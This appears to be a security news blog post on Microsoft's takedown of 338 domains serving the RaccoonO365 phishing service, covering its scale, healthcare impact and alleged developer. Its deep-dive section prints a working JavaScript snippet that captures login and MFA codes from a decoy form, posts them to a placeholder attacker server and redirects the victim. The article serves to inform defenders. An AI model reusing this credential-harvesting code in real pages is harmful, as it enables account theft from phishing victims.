Cyber Web Spider Blog – News
Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service

Posted on September 17, 2025 (updated September 18, 2025) by CWS

Since mid-2024, cybercriminals have used a subscription-based phishing platform known as RaccoonO365 to harvest Microsoft 365 credentials at scale.

Sold as an off-the-shelf service, RaccoonO365 requires minimal technical skill, allowing threat actors to deploy convincing phishing campaigns that impersonate official Microsoft communications.

These kits replicate Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.

As of September 2025, the operation has affected over 5,000 accounts across 94 countries, demonstrating the pervasive threat posed by commoditized social engineering tools.

In a coordinated legal action, Microsoft's Digital Crimes Unit (DCU) secured a court order from the Southern District of New York to seize 338 domains used to distribute RaccoonO365, effectively dismantling the platform's core infrastructure.

Microsoft analysts noted the rapid evolution of the service, which now offers features that subvert MFA protections and automate credential harvesting at rates of up to 9,000 targets per day.

The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch new attacks.

Although not all stolen credentials led to direct network intrusions, the impact on high-value sectors, particularly healthcare, was severe.

At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.

Microsoft's partnership with Health-ISAC underscored the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.

The DCU's swift intervention illustrates the necessity of legal and technical countermeasures against low-barrier tools that empower malicious actors.

Microsoft analysts identified Joshua Ogundipe, a Nigeria-based developer, as the principal architect of RaccoonO365.

Through an operational security lapse that revealed a cryptocurrency wallet, investigators traced over US$100,000 in subscription payments.

Ogundipe's Telegram channel, with more than 850 members, advertised both standard phishing kits and a newly launched "AI-MailCheck" service designed to refine spear-phishing efficacy.

This attribution underscores how streamlined criminal enterprises can scale with minimal overhead, challenging defenders to anticipate modular threat services.

Infection Mechanism Deep Dive

RaccoonO365's infection mechanism revolves around dynamic form injection and transparent redirection tactics.

When a victim clicks a malicious link, the browser is redirected to a decoy login page that mirrors Microsoft's official portal.

RaccoonO365 login page (Source – Microsoft)

A small JavaScript snippet, injected at runtime, captures the input fields and forwards the credentials to the attacker's server:

// Both URLs in this snippet were stripped from the page's copy; the
// bracketed placeholders stand in for them and are not real addresses.
document.querySelector('form').addEventListener('submit', function (e) {
  e.preventDefault();
  // Collect the username, password and MFA code typed into the decoy form
  let creds = {
    user: document.getElementById('username').value,
    pass: document.getElementById('password').value,
    otp: document.getElementById('mfa').value
  };
  // POST the captured values to the attacker's collector, then send the
  // victim on to the genuine login page so nothing looks wrong
  fetch('[ATTACKER-SERVER-URL]', {
    method: 'POST',
    body: JSON.stringify(creds),
    headers: {'Content-Type': 'application/json'}
  }).then(() => window.location.href = '[OFFICIAL-LOGIN-URL]');
});

This code performs seamless data exfiltration while redirecting the user to the official login page, minimizing suspicion.

More advanced operators use session-token reuse and header manipulation to bypass MFA prompts.

RaccoonO365 advertising a new AI-enabled service (Source – Microsoft)

Combined with automated email distribution and AI-driven content variation, this infection chain exemplifies modern phishing sophistication and underscores the critical importance of layered defenses and user awareness.
